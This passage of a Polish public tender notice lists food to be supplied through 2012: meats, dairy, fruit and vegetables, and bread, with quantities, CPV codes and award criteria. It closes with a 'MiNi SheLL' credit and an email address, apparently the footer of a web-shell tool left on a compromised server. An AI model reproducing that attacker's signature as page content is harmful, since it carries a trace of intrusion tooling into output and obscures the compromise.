20	Kiełbasa szynkowa wieprz.	25 kg				
21	Szynka lubuska	20 kg				
22	Szynka wędzona	5 kg				
23	Lunchmeat królewski	30 kg				
24	Kiełbasa polska wędzona	15 kg				
25	Kiełbasa krakowska sucha	15 kg				
26	Serdelki wieprzowe	20 kg				
27	Kabanos dębowy	5 kg				
28	Kiełbasa biała surowa	10 kg				
	Wędliny - wartość ogółem :					
	Mięso					
1	Mięso stekowe wieprzowe	40 kg				
2	Mięso mielone wieprzowe	20 kg				
3	Mięso mielone wieprz-wołowe	120 kg				
4	Kości wędzone	50 kg				
5	Kości wieprzowe	60 kg				
6	Porcja rosołowa	70 kg				
7	Kurczak świeży	40 kg				
8	Żołądki drobiowe	30 kg				
9	Wątróbka drobiowa	30 kg				
10	Wątroba wieprzowa	10 kg				
11	Udka z kurczaka	25 kg				
12	Ćwiartki z kurczaka	60 kg				
13	Filet drobiowy z kurczaka	50 kg				
14	Filet drobiowy z indyka	20 kg				
15	Skrzydełka z kurczaka	25kg				
16	Łopatka b / k	130 kg				
17	Schab b / k	50 kg				
18	Karczek b / k	60 kg				
19	Żeberka wieprzowe	25 kg				
20	Gulaszowe z indyka	10  kg				
21	Kaszanka wieprzowa	25 kg				
Zamawiający nie jest zobowiązany do zamówienia podanych w załączniku ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> artykuły mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa artykułu zamawianego	Nazwa producenta oferowanego przez dostawcę	Wielkość 12  miesięcznego zamówienia	
1	Mleko 2% karton świeże 1 l		2,500 litrów				
2	Jogurt owocowy typu Jogobella lub równoważny 150 g		200 szt				
3	Jogurt owocowy typu Campina Finezja lub równoważny 115 g		200 szt				
4	Serek wiejski 150 g		180 szt				
5	Śmietana 12% kubek 400 g		300 szt				
6	Śmietana 18% kubek 400 g		10 szt				
7	Serek homogenizowany 
różne smaki 150 g		400 szt				
8	Twaróg śmietankowy 250g kostka		200 szt				
9	Jogurt do picia 
różne smaki 330 g		200 szt				
10	Maślanka 750 g.-smakowa  butelka		60 szt				
11	Deser z koroną 
różne smaki 175 g		200 szt				
12	Ser żółty- salami		50 kg				
13	Ser żółty- gouda		70 kg				
14	Twaróg na sernik 1kg.-
w wiaderku		40 kg				
15	Ser topiony bloczek
różne smaki 100 g		150 szt				
16	Kefir , 400g.butelka		60 szt				
17	Deser monte - 4 x 256g.		30 op				
18	Twaróg półtłusty krajanka		60 kg				
19	Ser topiony w plastrach 
różne smaki 150g		120 szt				
20	Mleko słodzone gotowane 510 g		20 szt				
21	Twaróg chudy folia 1kg.		30 kg				
22	Deser ryżowy
różne smaki 150 g 		120 szt				
23	Deser kaszka manna z polewą
różne smaki 175 g		120 szt				
23	Śmietanka kremówka 30% 1 l karton		10 l				
24	Mleko skondensowane słodzone 533g		10 szt				
25	Serek śmietankowy 
różne smaki 125 g		150 szt				
Zamawiający nie jest zobowiązany do zamówienia podanych w załączniku ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Owoce					
1	Banany	120 kg				
2	Cytryna	60 kg				
3	Jabłka	500 kg				
4	Gruszki	60 kg				
5	Kiwi	40 kg				
6	Mandarynki	50 kg				
7	Pomarańcza	100 kg				
8	Truskawka ( mrożona)	35 kg				
9	Winogron	10 kg				
10	Arbuz	50 kg				
11	Truskawka świeża	20 kg				
12	Jagody świeże	10 kg				
13	Brzoskwinia	80 kg				
14	Nektarynka	50 kg				
15	Śliwki	10 kg				
	Warzywa					
1	Burak czerwony	130 kg				
2	Botwinka	20 pęczków				
3	Cebula	160 kg				
4	Brokuł (mrożony)	70 kg				
5	Czosnek surowy	10 kg				
6	Fasolka szparagowa żółta lub zielona	10 kg				
7	Fasolka szparagowa(mrożona)	30 kg				
8	Kalafior świeży	10 kg				
9	Kalafior ( mrożony)	70 kg				
10	Kapusta biała	120 kg				
11	Kapusta czerwona	50 kg				
12	Kapusta kwaszona	250 kg				
13	Kapusta młoda	20 kg				
14	Kapusta pekińska	50 kg				
15	Kapusta włoska	20 kg				
16	Koperek	200 pęczków				
17	Marchew korzeń	300 kg				
18	Mieszanka 8-składnikowa (mrożonka)	40 kg				
19	Mieszanka marchew z groszkiem (mrożonka)	30 kg				
20	Ogórek świeży	200 kg				
21	Ogórek kwaszony	120 kg				
22	Papryka świeża(różne kolory)	30 kg				
23	Pieczarka	80 kg				
24	Pietruszka korzeń	80 kg				
25	Pietruszka natka	220 pęczków				
26	Pomidor	150 kg				
27	Por	60 kg				
28	Rzodkiewka	120 pęczków				
29	Frytki (mrożonka)	100 kg				
30	Sałata zielona	120 szt				
31	Seler korzeń	90 kg				
32	Szczaw świeży	25 pęczków				
33	Szczypiorek	220 szt				
34	Włoszczyzna ( mrożonka)	15 kg				
35	Ziemniaki	2000 kg				
Zamawiający nie jest zobowiązany do zamówienia podanych w załączniku ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa artykułu zamawianego	Wielkość 12- miesięcznego zamówienia	
1	Chleb pszenno-żytni  krojony 600 g	2000 szt				
2	Bułka wrocławska, zwykła 100 g	800 szt				
3	Chleb graham,krojony 500g	50 szt				
4	Bułka słodka 100 g	500 szt				
5	Pączek 100 g	400 szt				
6	Chleb tostowy, krojony 400g	120 szt				
7	Chleb wieloziarnisty, krojony 400 g	50 szt				
8	Bułka grahamka 80 g	1000 szt				
9	Chleb magnus,krojony 350g 	50 szt				
10	Rogal maślany 100 g	100 szt				
11	Chałka 300 g	50 szt				
12	Bułka wrocławska hamburger 100 g	100 szt				
13	Bułka wrocławska
hot -dog 100 g	100 szt				
14	Bułka maślana 70 g	100 szt				
15	Chleb domowy,krojony 600g	35 szt				
Zamawiający nie jest zobowiązany do zamówienia podanych w załączniku ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com